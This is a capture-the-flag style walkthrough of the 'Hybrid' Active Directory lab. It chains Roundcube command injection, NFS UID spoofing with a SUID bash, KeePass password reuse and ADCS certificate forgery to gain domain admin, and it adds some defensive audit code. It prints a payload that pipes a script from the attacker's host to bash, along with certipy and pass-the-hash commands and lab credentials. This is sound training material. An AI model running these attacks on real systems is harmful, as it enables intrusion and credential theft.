Walkthrough – Hybrid (Vulnlab and Hack The Box HTB)

This is a walkthrough of the AD chain called “Hybrid” from Vulnlab: https://www.vulnlab.com

As of June 2025, Hack The Box HTB has migrated Vulnlab machines onto their lab offerings.

NOTE: The target IP will vary in this walkthrough as it took me several days to complete the AD chain and compromise both machines.

The AD chain contains two machines: the Roundcube mail server and the DC. To complete this lab you need to compromise the mail server first and then use it to reach the DC by forging an Active Directory certificate.

Mail01 server

Enumeration

rustscan

I run rustscan against the mail server and get some open ports.

rustscan -a 10.10.147.214 --ulimit 5000 --range 1-65535 -- -sVC -Pn

nuclei

I run nuclei and it flags CVE-2023-48795 (“Terrapin”) on the SSH service, but I’m not able to make use of it against the target.

web server redirect

I also navigate directly to the mail server via its IP and I get redirected to mail01.hybrid.vl

I add the hostname to my /etc/hosts file and navigate to the URL in the browser:

We now see a login page for Roundcube Webmail.

NFS Mount

Going back to the rustscan output, we can also see NFS running on the mail server.

We run the showmount command to check which directories are exported:

Now we will mount to the NFS share:

sudo mount -t nfs 10.10.178.134:/opt/share /home/kali/loot/vulnlab/hybrid/mail01

There is a tar archive (backup.tar) on the share; we extract it and investigate the contents:

tar -xf backup.tar

Investigating the dovecot-users file we can see creds for 2 users:

admin@hybrid.vl:{plain}Duckling21
peter.turner@hybrid.vl:{plain}PeterIstToll!

I go back to the login page and I’m able to login to both accounts:

Initial Foothold – Roundcube Webmail RCE

I read the message from the admin and see a clue for the initial foothold.

Doing a google search with those keywords we can see an advisory for markasjunk RCE.

I check the version and confirm that the installed Roundcube is affected:

There is a very detailed post on how to execute this exploit here:

https://cyberthint.io/roundcube-markasjunk-command-injection-vulnerability/

From the post, we can craft a payload that triggers the command injection. The injected command fetches a shell script from our host and pipes it to bash, which gives us a shell on the machine:

admin&curl${IFS}10.8.2.31/shell.sh${IFS}|/bin/bash${IFS}&@hybrid.vl

We can host a shell script on our python server with the following content:

I log into the admin webmail this time and enter the payload as in the screenshot below:

I then go into the inbox/sent and mark ANY message as junk and get a shell back.

We see a GET request arrive at our Python server, and right after that a shell connects back to our netcat listener on port 1337.

Privesc – NFS, UID and SUID bit on /bin/bash to peter.turner

I ran linpeas to look for privesc paths but didn’t have any luck with the CVEs listed in the screenshot below:

I checked the output again and noticed there are read/write permissions on the NFS share.

I check the /etc/exports file as well.

Attempting to cd into /home/peter.turner@hybrid.vl is unsuccessful. Running id peter.turner shows the user’s UID and GID:

We cannot privesc to root directly from here, but we can potentially go from www-data to peter.turner first and then try for root from there. The share /opt/share is writable from our machine, and NFS trusts the numeric UID the client presents. That means we can place a copy of /bin/bash on the share, make it owned by peter.turner’s UID and set the SUID bit on it with chmod +s. Any local user on the target, such as www-data, can then run ./bash -p from the share and get a shell with peter.turner’s effective UID, because the -p flag keeps the privileges granted by the SUID bit.

I create a user on my kali machine with the same UID as peter.turner but I have an issue as the range is above the default configs on my machine:

sudo useradd zero -u 902601108

I edit /etc/login.defs and change the UID_MAX value.

Changed to 902601109.

I still get an error.

I delete the user and add again.

NOTE: In the next screenshots I mounted to the “temp” folder on my kali machine, different folder from previous screenshots to copy/modify files.

I switch to the zero user with the same uid as peter.turner and copy /bin/bash from my machine to the mount.

su zero
cp /bin/bash temp

Next I go to the /opt/share folder on the target machine and run ./bash -p, which should run bash as the user whose UID owns the binary, but I get an error:

It seems the GNU C Library (glibc) on the target is older than the one my Kali bash binary was built against, so it’s better to take /bin/bash from the target system itself and just set the SUID bit on it with chmod +s as the zero user, who has the same UID as peter.turner.

From my Kali machine, I apply the SUID bit as the zero user.

Going back to the www-data user on the target machine, listing the permissions shows that the bash binary on the share is owned by peter.turner and has the SUID bit set.

Once we run ./bash -p as the www-data user, we gain the identity of peter.turner and can confirm below.
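As an added defensive check, not part of the original walkthrough, the following Python looks for the two server-side conditions this privesc needed: an export reachable from arbitrary hosts and writable without all_squash (so the NFS client picks the owner UID of the files it writes), and setuid files turning up under the exported directory. The exports line and the temporary directory are constructed for the demo; no real NFS is involved.

```python
import os
import stat
import tempfile


def parse_exports(text):
    """Parse /etc/exports text into (path, host, options) tuples."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients:
            host, _, opts = client.partition("(")
            options = opts.rstrip(")").split(",") if opts else []
            entries.append((path, host, options))
    return entries


def audit_exports(text):
    """Return {path: [issues]} for exports a remote client could abuse."""
    report = {}
    for path, host, options in parse_exports(text):
        issues = []
        if host == "*" or host.startswith("*."):
            issues.append("exported to any host")
        if "rw" in options and "all_squash" not in options:
            issues.append("writable without all_squash: client chooses file owner UID")
        if "no_root_squash" in options:
            issues.append("no_root_squash: remote root keeps root on the server")
        if issues:
            report[path] = issues
    return report


def find_setuid(root):
    """Walk a directory and list regular files carrying the setuid or setgid bit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(full)
    return sorted(hits)


def demo():
    """Constructed exports entry plus a planted setuid file in a temp dir."""
    exports = "/opt/share *(rw,sync,no_subtree_check)\n"  # constructed sample
    with tempfile.TemporaryDirectory() as share:
        planted = os.path.join(share, "bash")
        open(planted, "w").close()
        os.chmod(planted, 0o4755)  # setuid bit, as planted in the walkthrough
        return audit_exports(exports), [os.path.basename(p) for p in find_setuid(share)]
```

On the server, restricting the export to known hosts with all_squash and mounting the filesystem that holds the exported directory with nosuid removes both conditions, since a planted SUID bit is then ignored at execution time.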

We can also go into the peter.turner folder and see the user flag.

We also see a passwords.kdbx file which is a KeePass file and transfer it over into the NFS mount for download onto our kali machine.

Privesc – Root via KeePass creds

We try to open it via KeePass2 on our kali machine but need the master password:

We already have peter.turner’s Roundcube password from the backup file earlier (PeterIstToll!). We check for password reuse and it opens the kdbx file, so we can look through it for creds.

We get more creds for the peter.turner user:

I ssh into the mail server for a more stable shell and to check the creds work:

ssh "peter.turner@hybrid.vl"@10.10.190.182
b0cwR+G4Dzl_rw

Running sudo -l we can see that the peter.turner user can simply become root with sudo su command and user creds:

DC server

Enumeration

rustscan

Running rustscan we can see that based on the open ports this is a Windows DC server.

netexec / nxc

I check if the creds are legit with nxc and see that I am able to authenticate:

nxc bloodhound module

I use the nxc bloodhound module to get a bloodhound zip file to ingest into bloodhound.

nxc ldap hybrid.vl -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' --bloodhound -c all -ns 10.10.190.181

I simply copy the bloodhound zip file to my current folder:

After investigating the bloodhound data, I couldn’t find anything useful to help me with the DC:

Foothold – Active Directory Certificate Forgery via certipy

Next I check for potentially misconfigured AD certificate templates using certipy. I recommend checking out the THM room for this type of certificate misconfiguration abuse and guide to certipy here: https://tryhackme.com/r/room/cve202226923

We will be using this tool: https://github.com/ly4k/Certipy

It can also be installed via pip with the following command on our Kali machine:

pip3 install certipy-ad

I run the following command to check for any potentially misconfigured certificate templates:

certipy-ad find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -dc-ip 10.10.231.197

We check the .txt file and see the output.

We can see that the cert template called “HybridComputers” is flagged as vulnerable: “Enrollee supplies subject and template allows client authentication”.

If we look closely it has enrollment permissions for Domain Admins and Enterprise Admins.

We can potentially abuse this to privesc and get an NTLM for a domain admin.

Also note the minimum RSA key length as we will use this to construct our certipy command later to forge the certificate.
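As an added defensive check that is not part of the walkthrough, the following Python encodes the conditions certipy reports here (enrollee supplies the subject, a client-authentication EKU, no manager approval, and enrollment rights for low-privileged principals) as an audit of a template’s attributes, using the flag values from the AD certificate template schema. The HybridComputers dict is a constructed model of the page’s template; Domain Computers enrollment is an assumption, inferred from MAIL01$ being able to enroll.

```python
# Bit values from the msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag
# attributes of an AD certificate template object.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag (manager approval)

# EKUs that make a certificate usable for logon as the named principal.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def esc1_reasons(tpl):
    """List every ESC1 condition a template meets; empty unless all five hold.
    tpl keys: name_flag, enrollment_flag, ekus (OIDs; empty = unrestricted),
    enroll (principals with Enroll rights), signatures (msPKI-RA-Signature)."""
    reasons = []
    if tpl["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject, so the SAN can name any user")
    if not tpl["ekus"] or set(tpl["ekus"]) & AUTH_EKUS:
        reasons.append("template allows client authentication")
    if not tpl["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval required")
    if tpl["signatures"] == 0:
        reasons.append("no authorized signatures required")
    weak = sorted(set(tpl["enroll"]) & LOW_PRIV)
    if weak:
        reasons.append("low-privileged enrollment: " + ", ".join(weak))
    return reasons if len(reasons) == 5 else []

# Constructed model of the page's HybridComputers template. Domain Computers
# enrollment is an assumption, inferred from MAIL01$ being able to enroll.
HYBRID_COMPUTERS = {
    "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "enrollment_flag": 0,
    "ekus": ["1.3.6.1.5.5.7.3.2"],
    "enroll": ["Domain Admins", "Enterprise Admins", "Domain Computers"],
    "signatures": 0,
}

def hardened(tpl):
    """Remediation: stop the enrollee choosing the subject and require approval."""
    fixed = dict(tpl)
    fixed["name_flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    fixed["enrollment_flag"] |= CT_FLAG_PEND_ALL_REQUESTS
    return fixed
```

Removing Domain Computers from the Enroll ACE is the other fix the audit accepts; either change alone is enough to take the template out of the ESC1 set.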

If we go back into the RoundCube mail server, there are a few files that stick out in the /etc folder:

There is a krb5.keytab file, which stores pairs of Kerberos principals (service or user names) and their corresponding long-term keys. It is a standard component of Kerberos, the network authentication protocol used to provide strong authentication for client/server applications, so finding one here makes sense for a domain-joined mail server.

As root on the mail server, we copy this file onto the NFS share so we can extract the NTLM using our kali machine.

We are going to extract the NTLM using KeyTabExtract. Tool can be found here: https://github.com/sosdave/KeyTabExtract

Running KeyTabExtract on the krb5.keytab file, we can extract the NTLM hash for the Mail01$ machine account.

We can now abuse ADCS with certipy and forge a certificate for the Administrator user using the NTLM of the MAIL01$ machine account.

certipy-ad req -u 'MAIL01$' -hashes ':0f916c5246fdbc7ba95dcef4126d57bd' -dc-ip 10.10.231.197 -ca hybrid-DC01-CA -template HYBRIDCOMPUTERS -upn administrator -target hybrid.vl -key-size 4096 -debug

Running the following command, we can see the NTLM hash for the Administrator user:

certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.231.197

We then run evil-winrm to login to the DC as an admin user:

evil-winrm -i 10.10.231.197 -u administrator -H 60701e8543c9f6db1a2af3217386d3dc

Conclusion

This was a fairly challenging AD set and took me several days to complete as my usual tools couldn’t easily pick up ways to escalate or move laterally. This proves that sometimes you need to be meticulous and look for files and configs that seem out of place in order to succeed. This was a good set to practice ADCS exploits as well as web application exploits.

– Z333RO
